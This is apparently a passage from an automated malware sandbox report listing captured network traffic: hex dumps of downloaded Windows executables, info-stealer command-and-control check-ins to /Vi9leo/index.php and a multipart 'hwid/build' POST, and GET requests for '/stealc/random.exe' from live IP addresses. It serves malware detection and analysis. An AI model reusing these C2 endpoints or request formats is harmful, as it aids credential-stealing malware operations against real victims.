00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:25 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "1f3950-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 2046288Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca 1d 00 5c 04 00 00 80 26 1d 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 89 d7 19 00 00 10 00 00 00 d8 19 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 6c ef 03 00 00 f0 19 00 00 f0 03 00 00 dc 19 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 52 00 00 00 e0 1d 00 00 2e 00 00 00 cc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 40 1e 00 00 02 00 00 00 fa 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 50 1e 00 00 04 00 00 00 fc 1d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 5c 08 01 00 00 60 1e 00 00 0a 01 00 00 00 1e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:27 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "3ef50-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 257872Content-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 26 Jul 2024 11:49:28 GMTServer: Apache/2.4.41 (Ubuntu)Last-Modified: Mon, 05 Sep 2022 10:49:08 GMTETag: "13bf0-5e7ebd4425100"Accept-Ranges: bytesContent-Length: 80880Content-Type: application/x-msdos-programData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:30 GMTContent-Type: application/octet-streamContent-Length: 1878528Last-Modified: Fri, 26 Jul 2024 11:17:18 GMTConnection: keep-aliveETag: "66a385be-1caa00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 be 40 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 b0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 e0 4a 00 00 04 00 00 78 aa 1c 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 9c 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 9c 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 de 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 b0 06 00 00 02 00 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 77 66 61 62 66 71 6f 65 00 90 19 00 00 10 31 00 00 90 19 00 00 f4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 71 78 76 64 77 61 69 74 00 10 00 00 00 a0 4a 00 00 04 00 00 00 84 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 b0 4a 00 00 22 00 00 00 88 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 11:49:33 GMTContent-Type: application/octet-streamContent-Length: 1870848Last-Modified: Fri, 26 Jul 2024 11:16:43 GMTConnection: keep-aliveETag: "66a3859b-1c8c00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 cc 13 50 4a 88 72 3e 19 88 72 3e 19 88 72 3e 19 d3 1a 3d 18 86 72 3e 19 d3 1a 3b 18 28 72 3e 19 5d 1f 3a 18 9a 72 3e 19 5d 1f 3d 18 9e 72 3e 19 5d 1f 3b 18 fd 72 3e 19 d3 1a 3a 18 9c 72 3e 19 d3 1a 3f 18 9b 72 3e 19 88 72 3f 19 5e 72 3e 19 13 1c 37 18 89 72 3e 19 13 1c c1 19 89 72 3e 19 13 1c 3c 18 89 72 3e 19 52 69 63 68 88 72 3e 19 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 10 41 a2 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 18 00 e6 04 00 00 ca 01 00 00 00 00 00 00 a0 4a 00 00 10 00 00 00 00 05 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 d0 4a 00 00 04 00 00 cd 42 1d 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 57 a0 06 00 6b 00 00 00 00 90 06 00 e0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 14 82 4a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c4 81 4a 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 20 20 00 20 20 20 20 00 80 06 00 00 10 00 00 00 dc 02 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 e0 01 00 00 00 90 06 00 00 02 00 00 00 ec 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 a0 06 00 00 02 00 00 00 ee 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 20 20 20 20 20 20 20 20 00 60 2a 00 00 b0 06 00 00 02 00 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 61 78 61 6a 77 6c 6e 70 00 80 19 00 00 10 31 00 00 74 19 00 00 f2 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 75 62 70 69 63 79 63 75 00 10 00 00 00 90 4a 00 00 04 00 00 00 66 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 74 61 67 67 61 6e 74 00 30 00 00 00 a0 4a 00 00 22 00 00 00 6a 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: POST /OneCollector/1.0/ HTTP/1.1Accept: /APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENX7wUC+MYl+R+dP6Ge+Ps/gAK2S4rAvLsS9lNlstWnrY2Ovw6/QYWUW40yWi3W2oq2TgmfD/F4rhcGc/Q3kxTRWn1J3nPhOAny4YuIpbKp/JxVo2IKfr0u2Ob+Xasi+8kVvlgcJFM/02j6m9rZf8SsufBGSnZuCNcAMbSRQwAt9ttIddTRQ/7dkFG7ZzhfDKlscCwPqu8roSfIr2wEDw126PJnTg8kgpdZV8FhO09Z9yZkJbvNRCuX40AaiKTP7/kep+t5XHG1Tp05wc6bODUUz8SiWkHpg7isRn5nplH5Pwj6qy8wfjiPn8r9T6Iz9u6hFIAE=&p=Client-Id: NO_AUTHContent-Encoding: deflateContent-Type: application/bond-compact-binaryExpect: 100-continueSDK-Version: EVT-Windows-C++-No-3.4.15.1Upload-Time: 1721994783452Host: self.events.data.microsoft.comContent-Length: 7973Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 43 42 31 32 39 37 35 42 34 35 46 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A7CB12975B45F82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
Source: global traffic	HTTP traffic detected: GET /stealc/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: POST /Vi9leo/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 185.215.113.19Content-Length: 31Cache-Control: no-cacheData Raw: 64 31 3d 31 30 30 30 30 30 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000002001&unit=246122658369
Source: global traffic	HTTP traffic detected: GET /cost/random.exe HTTP/1.1Host: 185.215.113.16
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----BAKFBKEHDBGHJJKFIEGDHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 44 41 31 44 41 37 38 35 35 44 37 32 32 38 34 35 38 32 31 32 37 0d 0a 2d 2d 2d 2d 2d 2d 42 41 4b 46 42 4b 45 48 44 42 47 48 4a 4a 4b 46 49 45 47 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 